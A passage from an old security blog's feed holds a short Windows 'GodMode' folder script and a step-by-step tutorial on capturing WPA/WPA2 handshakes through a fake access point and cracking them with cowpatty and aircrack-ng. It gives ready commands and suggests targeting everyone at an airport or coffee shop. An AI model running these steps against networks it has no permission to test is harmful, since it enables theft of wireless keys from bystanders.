255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Manage Printers"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Manage Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Recent Places"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Recent Places.{22877a6d-37a1-461a-91b0-dbda5aaebc99}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Bluetooth Devices"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Bluetooth Devices.{28803F59-3A75-4058-995F-4EE5503B023C}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Workspaces Center (Remote Connections)"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Workspaces Center (Remote Connections).{241D7C96-F8BF-4F85-B01F-E2B043341A4B}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Windows Firewall"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Windows Firewall.{4026492F-2F69-46B8-B9BF-5654FC07E423}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Favorites"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Favorites.{323CA680-C24D-4099-B94D-446DD2D7249E}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Windows Update"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Windows Update.{36eef7db-88ad-4e81-ad49-0e313f0c35f8}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Rate and Improve Computer Preformance"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Rate and Improve Computer Preformance.{78F3955E-3B90-4184-BD14-5397C15F1EFC}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Main Godmode"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Main Godmode.{ED7BA470-8E54-465E-825C-99712043E01C}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Speech Recognition"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Speech Recognition.{58E3C745-D971-4081-9034-86E34B30836A}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "User Accounts"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "User Accounts.{60632754-c523-4b62-b45c-4172da012619}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Action Center"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Action Center.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Backup and Restore"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Backup and Restore.{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Backup and Restore"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Display.{C555438B-3C23-4769-A71F-B6D3D9B6053A}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Recovery"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Recovery.{9FE63AFD-59CF-4419-9775-ABCC3849F861}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "AutoPlay"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "AutoPlay.{9C60DE1E-E5FC-40f4-A487-460851A8D915}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "BitLocker Drive Encryption (Ultimate edition only)"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "BitLocker Drive Encryption (Ultimate edition only).{D9EF8727-CAC2-4e60-809E-86F80A666C91}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Font Settings"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Font Settings.{93412589-74D4-4E4E-AD0E-E0CB621440FD}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Parental Controls"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Parental Controls.{96AE8D84-A250-4520-95A5-A47A7E3C548B}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "Sync Center"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "Sync Center.{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Creating GodMode "System Information"...&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;mkdir&lt;/span&gt; "System Information.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}"&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt;.&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;echo&lt;/span&gt; [*] Changing back to .\&lt;br /&gt;&lt;span style="color: rgb(51, 51, 255);"&gt;cd&lt;/span&gt; ..&lt;br /&gt;==================================================================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-415974650402455457?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/415974650402455457'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/415974650402455457'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2011/10/many-faces-of-god-mode-in-windows-7.html' title='The Many Faces Of God Mode In Windows 7 - With Script'/><author><name>Travis Phillips</name><uri>http://www.blogger.com/profile/03109495184286865658</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='23' src='http://3.bp.blogspot.com/-47yG5MEgHcA/TxeD0WkkJxI/AAAAAAAAAEY/LGlRR6bwwpc/s220/33777_454923994603_707019603_5193965_7985624_n1.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-37iFJWBsn6Q/TophB3elTnI/AAAAAAAAACA/jQktO8bTsxc/s72-c/GodMode.png' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-5287695562308392426</id><published>2011-09-02T00:51:00.019-04:00</published><updated>2011-10-03T21:31:37.086-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='router'/><category scheme='http://www.blogger.com/atom/ns#' term='decrypt'/><category scheme='http://www.blogger.com/atom/ns#' term='genpmk'/><category scheme='http://www.blogger.com/atom/ns#' term='WPA2'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='wireless'/><category scheme='http://www.blogger.com/atom/ns#' term='patch'/><category scheme='http://www.blogger.com/atom/ns#' term='Cracking'/><category scheme='http://www.blogger.com/atom/ns#' term='WPA'/><category scheme='http://www.blogger.com/atom/ns#' term='cowpatty 4.6'/><category scheme='http://www.blogger.com/atom/ns#' term='cryptography'/><category scheme='http://www.blogger.com/atom/ns#' term='cowpatty'/><category scheme='http://www.blogger.com/atom/ns#' term='Rainbow Tables'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='BackTrack'/><category scheme='http://www.blogger.com/atom/ns#' term='encryption'/><category scheme='http://www.blogger.com/atom/ns#' term='Password Recovery'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>No Access Point? No Problem!: How to get a WPA\WPA2 keys 4-way handshake using Airbase-ng</title><content type='html'>Today we are going to look into how to get a WPA\WPA2 keys 4-way handshake from a client using Airbase-ng without them being connected or near their access point. This is useful as a lot of machines will throw beacon probes out for old access points they've connected to (you will see them while running airodump-ng at the bottom right). This means it is looking for that Access Point and wants to connect to it. What we will do with Airbase-ng is pretend we are that access point and let it attempt to connect to us.&lt;br /&gt;&lt;br /&gt;So for this tutorial I will be using:&lt;br /&gt;- One Attacker Box running BackTrack 5&lt;br /&gt;- One laptop running XP or 7 pre-configured to connect to a SSID of linksys with a WPA2 key set&lt;br /&gt;&lt;br /&gt;&lt;h2 style="text-align: center; color: rgb(0, 0, 0);"&gt;&lt;u&gt;Step 1: Going in to Monitor Mode&lt;/u&gt;&lt;/h2&gt;With that said let's first get things setup on the hacking machine by setting our wireless card into monitor mode using airmon-ng. since my wireless interface is "&lt;span style="color: rgb(204, 0, 0);font-family:lucida grande;" &gt;wlan0&lt;/span&gt;" I would use the command "&lt;span style=" font-weight: bold;font-family:lucida grande;" &gt;airmon-ng start wlan0&lt;/span&gt;". This will give us a virtual interface called "&lt;span style=" color: rgb(204, 0, 0);font-family:lucida grande;" &gt;mon0&lt;/span&gt;" which is in monitor mode&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a title="Airmon-ng setting wlan0 to monitor mode. (click for full size image)" href="http://1.bp.blogspot.com/-i_u_np_64V4/TmCWmru83qI/AAAAAAAAABA/6LzD9icLm3g/s1600/Screenshot-root%2540root_%2B%257E.png"&gt;&lt;img style="cursor:hand;" src="http://1.bp.blogspot.com/-i_u_np_64V4/TmCWmru83qI/AAAAAAAAABA/6LzD9icLm3g/s400/Screenshot-root%2540root_%2B%257E.png" alt="Airmon-ng setting wlan0 to monitor mode." id="BLOGGER_PHOTO_ID_5647679524041449122" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 style="text-align: center; color: rgb(0, 0, 0);"&gt;&lt;u&gt;&lt;u&gt;Step 2a: Setting up the fake AP (Single Known Target Method)&lt;br /&gt;&lt;/u&gt;&lt;/u&gt;&lt;/h2&gt;&lt;div style="text-align: left;"&gt; Use this method if you know the Targets AP ESSID or you only want to attack that one; otherwise use Step 2b instead but still read this section to get a better understanding first. Next let's taking a moment to look at the help options for airbase-ng, pictured below.&lt;/div&gt;&lt;/center&gt;&lt;br /&gt;&lt;center&gt;&lt;a title="Airbase-ng Help (click for full size image)" href="http://1.bp.blogspot.com/-fpWYzIRVFkw/TmCRni7EgYI/AAAAAAAAAA4/tWY9YyScmjs/s1600/airbase-ng%2Bhelp.png"&gt;&lt;img style="cursor:hand;" src="http://1.bp.blogspot.com/-fpWYzIRVFkw/TmCRni7EgYI/AAAAAAAAAA4/tWY9YyScmjs/s700/airbase-ng%2Bhelp.png" alt="Airbase-ng Help" id="BLOGGER_PHOTO_ID_5647674041298092418" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;So now let's set up our options here. For this attack I'm going to use the following command.&lt;span style="font-family:lucida grande;"&gt;(Note: This is case sensitive so pay close attention to this)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;airbase-ng -F ./Desktop/WPA-attack.cap --essid linksys -Z 2 -c 1 -i mon0 mon0&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I owe you a little explanation of what the command does. here's quick break down of what this command does as per the help screen.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;usage: airbase-ng &amp;lt;options&amp;gt; &amp;lt;replay interface&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;-F prefix : write all sent and received frames into pcap file&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;--essid &amp;lt;ESSID&amp;gt; : specify a single ESSID (short -e)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;-Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;-c channel : sets the channel the fake AP is going to run on&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;-i iface : capture packets from this interface&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;So, basically this command will set up &lt;span style="font-family:lucida grande;"&gt;mon0&lt;/span&gt; to listen and answer (&lt;span style="font-family:lucida grande;"&gt;-i mon0 mon0&lt;/span&gt;) as a WPA&lt;span style="font-family:lucida grande;"&gt;2&lt;/span&gt;-TKIP access Point (&lt;span style="font-family:lucida grande;"&gt;-Z 2&lt;/span&gt;) running on channel 1 (&lt;span style="font-family:lucida grande;"&gt;-c 1&lt;/span&gt;) with the SSID of linksys (&lt;span style="font-family:lucida grande;"&gt;--essid linksys&lt;/span&gt;) and log all packets to a log file on the desktop (&lt;span style="font-family:lucida grande;"&gt;-F ./Desktop/WPA-attack.cap&lt;/span&gt;).&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a title="Airbase-ng in Action (click for full size image)" href="http://3.bp.blogspot.com/-W_qdsuOS9SI/TmCaDi5i1NI/AAAAAAAAABI/Tqzy3TBUar4/s1600/airbase-ng_hack.png"&gt;&lt;img style="display:text-align:center; cursor:hand;" src="http://3.bp.blogspot.com/-W_qdsuOS9SI/TmCaDi5i1NI/AAAAAAAAABI/Tqzy3TBUar4/s600/airbase-ng_hack.png" alt="Airbase-ng in Action" id="BLOGGER_PHOTO_ID_5647683318421050578" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Above is a console picture of it in action. As you can see in the last 3 lines the machine is attempting to authenicate to our fake AP, once you see this line once it is safe to open another terminal and try to open the pcap file (in my case &lt;span style="font-family:lucida grande;"&gt;./Desktop/WPA-attack.cap-01.cap&lt;/span&gt;) with aircrack-ng to confirm you got a handshake.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a title="Aircrack-ng shows we have the handshake! (click for full size image)" href="http://1.bp.blogspot.com/-nUhNBHZzvAA/TmCb9CEWzlI/AAAAAAAAABQ/EIn9FAAuZiY/s1600/aircrack-ng%2Bshowing%2Bthe%2Bhandshake.png"&gt;&lt;img style="text-align:center;cursor:hand;" src="http://1.bp.blogspot.com/-nUhNBHZzvAA/TmCb9CEWzlI/AAAAAAAAABQ/EIn9FAAuZiY/s600/aircrack-ng%2Bshowing%2Bthe%2Bhandshake.png" alt="Aircrack-ng shows we have the handshake!" id="BLOGGER_PHOTO_ID_5647685405552070226" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;So on this note, we see we got a handshake!&lt;br /&gt;&lt;br /&gt;&lt;h2 style="text-align: center; color: rgb(0, 0, 0);"&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;Step 2b: Setting up the fake AP (Unknown Target Method)&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/h2&gt;&lt;span style="color: rgb(255, 0, 0); font-weight: bold;"&gt;Warning&lt;/span&gt;: This method will attempt to attack every probe it sees! if you didn't know the ESSID of the client or just wanted to attack everyone in the area (airport or coffee shop anyone?) use this type of command.&lt;br /&gt;&lt;br /&gt;&lt;span style=" font-weight: bold;font-family:lucida grande;" &gt;airbase-ng  -P -C 500 -Z 2 -c 1 -i mon0 -F ./Desktop/Probe_hits mon0&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;It's Pretty much the same as the one from step 2 expect instead of using "--essid linksys" we used "-P -C 500" (case sensitive. So note they are uppercase switches)&lt;br /&gt;&lt;br /&gt;&lt;span style=" font-weight: bold;font-family:lucida grande;" &gt;&lt;/span&gt;&lt;span style="font-style: italic;"&gt;usage: airbase-ng &amp;lt;options&amp;gt; &amp;lt;replay interface&amp;gt;&lt;/span&gt; &lt;ul style="font-style: italic;"&gt;&lt;li&gt;-F prefix : write all sent and received frames into pcap file&lt;/li&gt;&lt;li&gt;-P : respond to all probes, even when specifying ESSIDs&lt;/li&gt;&lt;li&gt;-C seconds : enables beaconing of probed ESSID values (requires -P)&lt;/li&gt;&lt;li&gt;-Z type : same as -z, but for WPA2. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104&lt;/li&gt;&lt;li&gt;-c channel : sets the channel the AP is running on&lt;/li&gt;&lt;li&gt;-i iface : capture packets from this interface&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a title="Airbase-ng Responding to all beacons. (click for full size image)" href="http://1.bp.blogspot.com/-VZGugnaz32s/TmCgXPv2MDI/AAAAAAAAABY/IKSUnI4M10c/s1600/airbase-ng%2Bprobe%2Bresponder.png"&gt;&lt;img style="text-align:center;cursor:hand;" src="http://1.bp.blogspot.com/-VZGugnaz32s/TmCgXPv2MDI/AAAAAAAAABY/IKSUnI4M10c/s600/airbase-ng%2Bprobe%2Bresponder.png" alt="Airbase-ng Responding to all beacons." id="BLOGGER_PHOTO_ID_5647690253947252786" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;With this approach I changed the victims wireless connection settings from linksys to "testing" as you can see it found it, repeated it, and allow the client to connect. Thus also getting the handshake same as above.&lt;br /&gt;&lt;br /&gt;&lt;h2 style="text-align: center; color: rgb(0, 0, 0);"&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;Step 3a: Cracking it with Cowpatty and rainbow tables&lt;br /&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/h2&gt;This is my preferred method of cracking WPA/WPA2. However Cowpatty (even the install on backtrack) will by default not detect the 4-way handshake obtained with these methods unless you patch it. You can patch it with an &lt;a href="http://theunl33t.blogspot.com/2011/06/patch-compile-and-installing-cowpatty.html"&gt;article&lt;/a&gt; I wrote on how to do this step-by-step or via a script that I coded for that, both of which can be found &lt;a href="http://theunl33t.blogspot.com/2011/06/patch-compile-and-installing-cowpatty.html"&gt;here&lt;/a&gt;. With Cowpatty patch just use the following command:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a title="Command to crack using Cowpatty. (click for full size image)" href="http://1.bp.blogspot.com/-iXYfpyroa5o/TmCjLtPYvTI/AAAAAAAAABg/9fL3oFrDZv4/s1600/cowpatty%2Bcommand.png"&gt;&lt;img style="text-align:center; cursor:hand;" src="http://1.bp.blogspot.com/-iXYfpyroa5o/TmCjLtPYvTI/AAAAAAAAABg/9fL3oFrDZv4/s600/cowpatty%2Bcommand.png" alt="Command to crack using Cowpatty." id="BLOGGER_PHOTO_ID_5647693354240621874" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=" font-weight: bold;font-family:lucida grande;" &gt;cowpatty -r ./Desktop/WPA-attack.cap-01.cap -s linksys -d linksysHashTable&lt;/span&gt;&lt;span style="font-family:lucida grande;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;In this command the -r points cowpatty to the Capture file with the handshake. The -s is used to indicate the ESSID to the program. Finally, the -d points to my rainbow table for this SSID. If you need rainbow tables for Cowpatty the I recommend you checkout the &lt;a href="http://www.renderlab.net/projects/WPA-tables/"&gt;church of WiFi&lt;/a&gt; set from &lt;a href="http://www.renderlab.net/projects/WPA-tables/"&gt;renderlabs&lt;/a&gt; webpage as they have a free set containing 33GB of tables made from the top 1,000 SSIDs seen on &lt;a href="http://wigle.net/"&gt;WiGLE&lt;/a&gt; (Wireless Geographic Logging Engine) which is a community for wardrivers to upload their GPS wardriving data and mapped on the site for all to see.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a title="Cracked in 2 seconds using Cowpatty! (click for full size image)" href="http://4.bp.blogspot.com/-M9u82aOKvu8/TmCmLO_NhnI/AAAAAAAAABo/_NBRN64nscQ/s1600/cowpatty%2Bdone.png"&gt;&lt;img style="text-align:center; cursor:hand;" src="http://4.bp.blogspot.com/-M9u82aOKvu8/TmCmLO_NhnI/AAAAAAAAABo/_NBRN64nscQ/s700/cowpatty%2Bdone.png" alt="" id="BLOGGER_PHOTO_ID_5647696644654597746" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;If that image isn't encourgement to get your rainbow tables I don't know what is. Cracked after 395,442 try in about 2.5 seconds!!! So worth the download and space to keep these handy. If the SSID is one not in the kit you can make it following this &lt;a href="http://theunl33t.blogspot.com/2011/06/how-to-generate-rainbow-tables-for.html"&gt;post here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2 style="text-align: center; color: rgb(0, 0, 0);"&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;&lt;u&gt;Step 3b: Cracking it with aircrack-ng using a Dictionary&lt;br /&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/u&gt;&lt;/h2&gt;In this attack we will use Aircrack-ng with a the default dictionary that comes with BackTrack (located under &lt;span style="font-family:lucida grande;"&gt;/pentest/password/wordlist/darkc0de.lst&lt;/span&gt;). This is just to show you a second method and give you something to compare the time difference on rainbow table vs. dictionary attacks. To run it just do the following:&lt;br /&gt;&lt;br /&gt;&lt;span style=" font-weight: bold;font-family:lucida grande;" &gt;aircrack-ng ./Desktop/WPA-attack.cap-01.cap -w &lt;/span&gt;&lt;span style="font-family: lucida grande; font-weight: bold;font-family:lucida grande;" &gt;/pentest/password/wordlist/darkc0de.lst&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a title="Aircrack-ng target selection (click for full size image)" href="http://1.bp.blogspot.com/-78lNh7Ob4uw/TmCo4PFeNpI/AAAAAAAAABw/EhM1vT-91S0/s1600/aircrack-ng%2Bcommand%2Band%2Bselection%2Bfor%2Battack.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/-78lNh7Ob4uw/TmCo4PFeNpI/AAAAAAAAABw/EhM1vT-91S0/s600/aircrack-ng%2Bcommand%2Band%2Bselection%2Bfor%2Battack.png" alt="Aircrack-ng target selection" id="BLOGGER_PHOTO_ID_5647699616798226066" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;On mine it was number two but just hit the number next to the network with the handshake you are attacking. You should see it start to run the attack.&lt;br /&gt;&lt;br /&gt;&lt;a title="Aircrack-ng Finished Cracking (click for full size image)" href="http://4.bp.blogspot.com/-0VApqDGfPjU/TmCp18qSbHI/AAAAAAAAAB4/4Sxo8__fcXo/s1600/aircrack-ng%2Bdone.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/-0VApqDGfPjU/TmCp18qSbHI/AAAAAAAAAB4/4Sxo8__fcXo/s600/aircrack-ng%2Bdone.png" alt="Aircrack-ng Finished Cracking" id="BLOGGER_PHOTO_ID_5647700677004258418" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;As you can see this worked too but it took 16 mins instead of 2 seconds. Whichever method is easier for you, that's the one to use. Hope this helps some people, if you have any questions feel free to leave a question in the comments area.&lt;br /&gt;&lt;br /&gt;Enjoy and stay out of trouble! ;-)&lt;br /&gt;&lt;span style=" font-weight: bold;font-family:lucida grande;" &gt;&lt;/span&gt;&lt;/div&gt;&lt;/center&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7020948317530945898-5287695562308392426?l=theunl33t.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/5287695562308392426'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7020948317530945898/posts/default/5287695562308392426'/><link rel='alternate' type='text/html' href='http://theunl33t.blogspot.com/2011/09/no-access-point-no-problem-how-to-get.html' title='No Access Point? No Problem!: How to get a WPA\WPA2 keys 4-way handshake using Airbase-ng'/><author><name>Travis Phillips</name><uri>http://www.blogger.com/profile/03109495184286865658</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='23' src='http://3.bp.blogspot.com/-47yG5MEgHcA/TxeD0WkkJxI/AAAAAAAAAEY/LGlRR6bwwpc/s220/33777_454923994603_707019603_5193965_7985624_n1.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-i_u_np_64V4/TmCWmru83qI/AAAAAAAAABA/6LzD9icLm3g/s72-c/Screenshot-root%2540root_%2B%257E.png' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-7020948317530945898.post-8581685758863814441</id><published>2011-08-23T19:48:00.012-04:00</published><updated>2011-10-03T21:19:57.767-04:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Script'/><category scheme='http://www.blogger.com/atom/ns#' term='computers'/><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='Tips and Tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='IT'/><category scheme='http://www.blogger.com/atom/ns#' term='Damn Vulnerable Web App'/><category scheme='http://www.blogger.com/atom/ns#' term='BackTrack'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='installing'/><category scheme='http://www.blogger.com/atom/ns#' term='DVWA'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title 